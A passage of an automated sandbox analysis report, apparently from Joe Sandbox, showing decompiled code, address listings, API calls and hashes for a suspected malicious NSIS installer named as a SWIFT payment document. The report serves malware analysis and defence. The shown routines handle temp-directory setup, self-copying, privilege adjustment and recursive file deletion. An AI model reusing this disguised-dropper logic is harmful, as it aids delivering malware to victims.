                                                                                  							if(_t178 == _t209) {
                                                                                  								L23:
                                                                                  								 *0x42a300 = 1;
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _t178 - _t188;
                                                                                  							if(_t178 != _t188) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						}
                                                                                  					} else {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					do {
                                                                                  						L16:
                                                                                  						_t198 = _t198 + 2;
                                                                                  						__eflags =  *_t198 - _t209;
                                                                                  					} while ( *_t198 == _t209);
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				goto L37;
                                                                                  			}



















































                                                                                  0x0040364e
                                                                                  0x0040364f
                                                                                  0x00403656
                                                                                  0x00403659
                                                                                  0x00403660
                                                                                  0x00403663
                                                                                  0x00403676
                                                                                  0x0040367c
                                                                                  0x0040367f
                                                                                  0x00403682
                                                                                  0x00403690
                                                                                  0x00403698
                                                                                  0x004036a3
                                                                                  0x004036bc
                                                                                  0x004036be
                                                                                  0x004036c6
                                                                                  0x004036c6
                                                                                  0x004036d1
                                                                                  0x004036d3
                                                                                  0x004036d3
                                                                                  0x004036e8
                                                                                  0x0040370d
                                                                                  0x0040371b
                                                                                  0x0040371e
                                                                                  0x00403725
                                                                                  0x0040372c
                                                                                  0x0040372c
                                                                                  0x00403725
                                                                                  0x0040372e
                                                                                  0x00403733
                                                                                  0x00403734
                                                                                  0x00403740
                                                                                  0x00403744
                                                                                  0x0040374b
                                                                                  0x00403759
                                                                                  0x0040375e
                                                                                  0x00403765
                                                                                  0x00403769
                                                                                  0x0040376d
                                                                                  0x0040376f
                                                                                  0x0040376f
                                                                                  0x0040376d
                                                                                  0x00403776
                                                                                  0x0040377d
                                                                                  0x00403783
                                                                                  0x0040379b
                                                                                  0x004037ab
                                                                                  0x004037b0
                                                                                  0x004037b6
                                                                                  0x004037bd
                                                                                  0x004037c4
                                                                                  0x004037c6
                                                                                  0x004037c7
                                                                                  0x004037d1
                                                                                  0x004037d8
                                                                                  0x004037da
                                                                                  0x004037dc
                                                                                  0x004037dc
                                                                                  0x004037ef
                                                                                  0x004037f1
                                                                                  0x004038eb
                                                                                  0x004038eb
                                                                                  0x004038ee
                                                                                  0x004038f1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004037fb
                                                                                  0x004037fc
                                                                                  0x004037ff
                                                                                  0x00403808
                                                                                  0x00403808
                                                                                  0x0040380b
                                                                                  0x0040380e
                                                                                  0x00403811
                                                                                  0x00403814
                                                                                  0x00403814
                                                                                  0x00403814
                                                                                  0x00403815
                                                                                  0x00403819
                                                                                  0x004038d9
                                                                                  0x004038e2
                                                                                  0x004038e4
                                                                                  0x004038e7
                                                                                  0x004038ea
                                                                                  0x004038ea
                                                                                  0x004038ea
                                                                                  0x00000000
                                                                                  0x0040381f
                                                                                  0x00403820
                                                                                  0x00403821
                                                                                  0x00403825
                                                                                  0x0040383f
                                                                                  0x00403846
                                                                                  0x00403859
                                                                                  0x0040385a
                                                                                  0x0040386f
                                                                                  0x00403874
                                                                                  0x00403876
                                                                                  0x00403878
                                                                                  0x00403894
                                                                                  0x0040389b
                                                                                  0x004038ae
                                                                                  0x004038af
                                                                                  0x004038c4
                                                                                  0x004038ca
                                                                                  0x004038cc
                                                                                  0x004038ce
                                                                                  0x004038d6
                                                                                  0x004038d8
                                                                                  0x00000000
                                                                                  0x004038d8
                                                                                  0x004038d2
                                                                                  0x004038d4
                                                                                  0x004038f9
                                                                                  0x004038fd
                                                                                  0x00403906
                                                                                  0x0040390b
                                                                                  0x00403911
                                                                                  0x0040391c
                                                                                  0x0040391e
                                                                                  0x00403923
                                                                                  0x00403925
                                                                                  0x0040397d
                                                                                  0x00403982
                                                                                  0x0040398b
                                                                                  0x00403992
                                                                                  0x00403995
                                                                                  0x00403b6c
                                                                                  0x00403b6c
                                                                                  0x00403b71
                                                                                  0x00403b7a
                                                                                  0x00403b97
                                                                                  0x00403c0f
                                                                                  0x00403c0f
                                                                                  0x00403c17
                                                                                  0x00403c19
                                                                                  0x00403c19
                                                                                  0x00403c1f
                                                                                  0x00403c1f
                                                                                  0x00403bae
                                                                                  0x00403bba
                                                                                  0x00403bcb
                                                                                  0x00403bd2
                                                                                  0x00403bd9
                                                                                  0x00403bd9
                                                                                  0x00403be1
                                                                                  0x00403bed
                                                                                  0x00403bfb
                                                                                  0x00403c06
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403bef
                                                                                  0x00403bef
                                                                                  0x00403bf0
                                                                                  0x00403bf2
                                                                                  0x00403bf3
                                                                                  0x00403bf4
                                                                                  0x00403bf9
                                                                                  0x00403c08
                                                                                  0x00403c0a
                                                                                  0x00000000
                                                                                  0x00403c0a
                                                                                  0x00000000
                                                                                  0x00403bf9
                                                                                  0x00403bed
                                                                                  0x00403b84
                                                                                  0x00403b8b
                                                                                  0x00403b8b
                                                                                  0x004039a1
                                                                                  0x00403a48
                                                                                  0x00403a48
                                                                                  0x00403a54
                                                                                  0x00000000
                                                                                  0x00403a54
                                                                                  0x004039b2
                                                                                  0x004039ba
                                                                                  0x00403a0c
                                                                                  0x00403a0c
                                                                                  0x00403a12
                                                                                  0x00403a19
                                                                                  0x00403a67
                                                                                  0x00403a69
                                                                                  0x00403a6e
                                                                                  0x00403a70
                                                                                  0x00403a78
                                                                                  0x00403a78
                                                                                  0x00403a83
                                                                                  0x00403a88
                                                                                  0x00403a8f
                                                                                  0x00403a95
                                                                                  0x00403a97
                                                                                  0x00403b6a
                                                                                  0x00403b6a
                                                                                  0x00403b6a
                                                                                  0x00000000
                                                                                  0x00403a9d
                                                                                  0x00403a9d
                                                                                  0x00403a9f
                                                                                  0x00403aa0
                                                                                  0x00403aa9
                                                                                  0x00403aa2
                                                                                  0x00403aa2
                                                                                  0x00403aa2
                                                                                  0x00403aaf
                                                                                  0x00403ab7
                                                                                  0x00403abe
                                                                                  0x00403ac6
                                                                                  0x00403ac6
                                                                                  0x00403ad3
                                                                                  0x00403adf
                                                                                  0x00403ae9
                                                                                  0x00403ae9
                                                                                  0x00403aeb
                                                                                  0x00403af2
                                                                                  0x00403afc
                                                                                  0x00403b08
                                                                                  0x00403b0e
                                                                                  0x00403b14
                                                                                  0x00403b17
                                                                                  0x00403b21
                                                                                  0x00403b27
                                                                                  0x00403b29
                                                                                  0x00403b2d
                                                                                  0x00403b3e
                                                                                  0x00403b44
                                                                                  0x00403b49
                                                                                  0x00403b4b
                                                                                  0x00403b4e
                                                                                  0x00403b54
                                                                                  0x00403b54
                                                                                  0x00403b4b
                                                                                  0x00403b29
                                                                                  0x00403b57
                                                                                  0x00403b5e
                                                                                  0x00403b5e
                                                                                  0x00403b5e
                                                                                  0x00403b5e
                                                                                  0x00403b65
                                                                                  0x00000000
                                                                                  0x00403b65
                                                                                  0x00403a97
                                                                                  0x00403a1b
                                                                                  0x00403a1e
                                                                                  0x00403a22
                                                                                  0x00403a27
                                                                                  0x00403a29
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403a35
                                                                                  0x00403a40
                                                                                  0x00403a45
                                                                                  0x00000000
                                                                                  0x00403a45
                                                                                  0x004039c3
                                                                                  0x004039db
                                                                                  0x004039ec
                                                                                  0x004039ed
                                                                                  0x004039f1
                                                                                  0x004039f3
                                                                                  0x00403a01
                                                                                  0x00403a08
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403a08
                                                                                  0x00403a0a
                                                                                  0x00000000
                                                                                  0x00403a0a
                                                                                  0x0040392d
                                                                                  0x00403939
                                                                                  0x0040393e
                                                                                  0x00403943
                                                                                  0x00403945
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040394d
                                                                                  0x00403955
                                                                                  0x00403966
                                                                                  0x0040396e
                                                                                  0x00403970
                                                                                  0x00403975
                                                                                  0x00403977
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403977
                                                                                  0x00000000
                                                                                  0x004038d4
                                                                                  0x0040387d
                                                                                  0x0040387f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403881
                                                                                  0x00403885
                                                                                  0x00403889
                                                                                  0x00403890
                                                                                  0x00403890
                                                                                  0x00403890
                                                                                  0x00403890
                                                                                  0x00000000
                                                                                  0x00403890
                                                                                  0x0040388b
                                                                                  0x0040388e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040388e
                                                                                  0x00403827
                                                                                  0x0040382b
                                                                                  0x0040382e
                                                                                  0x00403835
                                                                                  0x00403835
                                                                                  0x00000000
                                                                                  0x00403835
                                                                                  0x00403830
                                                                                  0x00403833
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403833
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403801
                                                                                  0x00403801
                                                                                  0x00403802
                                                                                  0x00403803
                                                                                  0x00403803
                                                                                  0x00000000
                                                                                  0x00403801
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                  • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                  • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                  • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000020,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000000), ref: 004037E9
                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                    • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" ,00000000,?), ref: 00403A8F
                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                  • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe,00420F08,00000001), ref: 00403B21
                                                                                  • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                  • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                  • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                  • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                  • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                  • String ID: "C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                  • API String ID: 2292928366-3809075559
                                                                                  • Opcode ID: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
                                                                                  • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                  • Opcode Fuzzy Hash: 576690ede7b5918326371ee6a86c03391da91488ae6859ca98bd2718df8a95ef
                                                                                  • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                                                  C-Code - Quality: 98%
                                                                                  			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				short _v556;
                                                                                  				short _v558;
                                                                                  				struct _WIN32_FIND_DATAW _v604;
                                                                                  				signed int _t38;
                                                                                  				signed int _t52;
                                                                                  				signed int _t55;
                                                                                  				signed int _t62;
                                                                                  				void* _t64;
                                                                                  				signed char _t65;
                                                                                  				WCHAR* _t66;
                                                                                  				void* _t67;
                                                                                  				WCHAR* _t68;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				_t65 = _a8;
                                                                                  				_t68 = _a4;
                                                                                  				_v8 = _t65 & 0x00000004;
                                                                                  				_t38 = E0040603F(__eflags, _t68);
                                                                                  				_v12 = _t38;
                                                                                  				if((_t65 & 0x00000008) != 0) {
                                                                                  					_t62 = DeleteFileW(_t68); // executed
                                                                                  					asm("sbb eax, eax");
                                                                                  					_t64 =  ~_t62 + 1;
                                                                                  					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                  					return _t64;
                                                                                  				}
                                                                                  				_a4 = _t65;
                                                                                  				_t8 =  &_a4;
                                                                                  				 *_t8 = _a4 & 0x00000001;
                                                                                  				__eflags =  *_t8;
                                                                                  				if( *_t8 == 0) {
                                                                                  					L5:
                                                                                  					E00406668(0x425750, _t68);
                                                                                  					__eflags = _a4;
                                                                                  					if(_a4 == 0) {
                                                                                  						E00405F83(_t68);
                                                                                  					} else {
                                                                                  						lstrcatW(0x425750, L"\\*.*");
                                                                                  					}
                                                                                  					__eflags =  *_t68;
                                                                                  					if( *_t68 != 0) {
                                                                                  						L10:
                                                                                  						lstrcatW(_t68, 0x40a014);
                                                                                  						L11:
                                                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                  						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                                                  						_t70 = _t38;
                                                                                  						__eflags = _t70 - 0xffffffff;
                                                                                  						if(_t70 == 0xffffffff) {
                                                                                  							L26:
                                                                                  							__eflags = _a4;
                                                                                  							if(_a4 != 0) {
                                                                                  								_t30 = _t66 - 2;
                                                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                  								__eflags =  *_t30;
                                                                                  							}
                                                                                  							goto L28;
                                                                                  						} else {
                                                                                  							goto L12;
                                                                                  						}
                                                                                  						do {
                                                                                  							L12:
                                                                                  							__eflags = _v604.cFileName - 0x2e;
                                                                                  							if(_v604.cFileName != 0x2e) {
                                                                                  								L16:
                                                                                  								E00406668(_t66,  &(_v604.cFileName));
                                                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                  								if(__eflags == 0) {
                                                                                  									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                                  									__eflags = _t52;
                                                                                  									if(_t52 != 0) {
                                                                                  										E004056CA(0xfffffff2, _t68);
                                                                                  									} else {
                                                                                  										__eflags = _v8 - _t52;
                                                                                  										if(_v8 == _t52) {
                                                                                  											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                  										} else {
                                                                                  											E004056CA(0xfffffff1, _t68);
                                                                                  											E00406428(_t67, _t68, 0);
                                                                                  										}
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                                                  									if(__eflags == 0) {
                                                                                  										E00405D74(__eflags, _t68, _a8);
                                                                                  									}
                                                                                  								}
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _v558;
                                                                                  							if(_v558 == 0) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _v558 - 0x2e;
                                                                                  							if(_v558 != 0x2e) {
                                                                                  								goto L16;
                                                                                  							}
                                                                                  							__eflags = _v556;
                                                                                  							if(_v556 == 0) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							goto L16;
                                                                                  							L24:
                                                                                  							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                                                  							__eflags = _t55;
                                                                                  						} while (_t55 != 0);
                                                                                  						_t38 = FindClose(_t70); // executed
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					__eflags =  *0x425750 - 0x5c;
                                                                                  					if( *0x425750 != 0x5c) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					goto L10;
                                                                                  				} else {
                                                                                  					__eflags = _t38;
                                                                                  					if(_t38 == 0) {
                                                                                  						L28:
                                                                                  						__eflags = _a4;
                                                                                  						if(_a4 == 0) {
                                                                                  							L36:
                                                                                  							return _t38;
                                                                                  						}
                                                                                  						__eflags = _v12;
                                                                                  						if(_v12 != 0) {
                                                                                  							_t38 = E0040699E(_t68);
                                                                                  							__eflags = _t38;
                                                                                  							if(_t38 == 0) {
                                                                                  								goto L36;
                                                                                  							}
                                                                                  							E00405F37(_t68);
                                                                                  							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                                  							__eflags = _t38;
                                                                                  							if(_t38 != 0) {
                                                                                  								return E004056CA(0xffffffe5, _t68);
                                                                                  							}
                                                                                  							__eflags = _v8;
                                                                                  							if(_v8 == 0) {
                                                                                  								goto L30;
                                                                                  							}
                                                                                  							E004056CA(0xfffffff1, _t68);
                                                                                  							return E00406428(_t67, _t68, 0);
                                                                                  						}
                                                                                  						L30:
                                                                                  						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                  						return _t38;
                                                                                  					}
                                                                                  					__eflags = _t65 & 0x00000002;
                                                                                  					if((_t65 & 0x00000002) == 0) {
                                                                                  						goto L28;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  			}


















                                                                                  0x00405d7e
                                                                                  0x00405d83
                                                                                  0x00405d8c
                                                                                  0x00405d8f
                                                                                  0x00405d97
                                                                                  0x00405d9a
                                                                                  0x00405d9d
                                                                                  0x00405da5
                                                                                  0x00405da7
                                                                                  0x00405da8
                                                                                  0x00000000
                                                                                  0x00405da8
                                                                                  0x00405db3
                                                                                  0x00405db6
                                                                                  0x00405db6
                                                                                  0x00405db6
                                                                                  0x00405dba
                                                                                  0x00405dcd
                                                                                  0x00405dd4
                                                                                  0x00405dd9
                                                                                  0x00405ddd
                                                                                  0x00405ded
                                                                                  0x00405ddf
                                                                                  0x00405de5
                                                                                  0x00405de5
                                                                                  0x00405df2
                                                                                  0x00405df6
                                                                                  0x00405e02
                                                                                  0x00405e08
                                                                                  0x00405e0d
                                                                                  0x00405e13
                                                                                  0x00405e1e
                                                                                  0x00405e24
                                                                                  0x00405e26
                                                                                  0x00405e29
                                                                                  0x00405ed3
                                                                                  0x00405ed3
                                                                                  0x00405ed7
                                                                                  0x00405ed9
                                                                                  0x00405ed9
                                                                                  0x00405ed9
                                                                                  0x00405ed9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405e2f
                                                                                  0x00405e2f
                                                                                  0x00405e2f
                                                                                  0x00405e37
                                                                                  0x00405e57
                                                                                  0x00405e5f
                                                                                  0x00405e64
                                                                                  0x00405e6b
                                                                                  0x00405e86
                                                                                  0x00405e8b
                                                                                  0x00405e8d
                                                                                  0x00405eb1
                                                                                  0x00405e8f
                                                                                  0x00405e8f
                                                                                  0x00405e92
                                                                                  0x00405ea6
                                                                                  0x00405e94
                                                                                  0x00405e97
                                                                                  0x00405e9f
                                                                                  0x00405e9f
                                                                                  0x00405e92
                                                                                  0x00405e6d
                                                                                  0x00405e73
                                                                                  0x00405e75
                                                                                  0x00405e7b
                                                                                  0x00405e7b
                                                                                  0x00405e75
                                                                                  0x00000000
                                                                                  0x00405e6b
                                                                                  0x00405e39
                                                                                  0x00405e41
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405e43
                                                                                  0x00405e4b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405e4d
                                                                                  0x00405e55
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405eb6
                                                                                  0x00405ebe
                                                                                  0x00405ec4
                                                                                  0x00405ec4
                                                                                  0x00405ecd
                                                                                  0x00000000
                                                                                  0x00405ecd
                                                                                  0x00405df8
                                                                                  0x00405e00
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405dbc
                                                                                  0x00405dbc
                                                                                  0x00405dbe
                                                                                  0x00405ede
                                                                                  0x00405ee0
                                                                                  0x00405ee3
                                                                                  0x00405f34
                                                                                  0x00405f34
                                                                                  0x00405f34
                                                                                  0x00405ee5
                                                                                  0x00405ee8
                                                                                  0x00405ef3
                                                                                  0x00405ef8
                                                                                  0x00405efa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405efd
                                                                                  0x00405f09
                                                                                  0x00405f0e
                                                                                  0x00405f10
                                                                                  0x00000000
                                                                                  0x00405f2b
                                                                                  0x00405f12
                                                                                  0x00405f15
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405f1a
                                                                                  0x00000000
                                                                                  0x00405f21
                                                                                  0x00405eea
                                                                                  0x00405eea
                                                                                  0x00000000
                                                                                  0x00405eea
                                                                                  0x00405dc4
                                                                                  0x00405dc7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00405dc7

                                                                                  APIs
                                                                                  • DeleteFileW.KERNELBASE(?,?,746AFAA0,746AF560,00000000), ref: 00405D9D
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,\*.*), ref: 00405DE5
                                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E0E
                                                                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*,?,?,746AFAA0,746AF560,00000000), ref: 00405E1E
                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                  • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsj2F71.tmp\*.*$\*.*
                                                                                  • API String ID: 2035342205-3049482134
                                                                                  • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                  • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                  • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                  • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
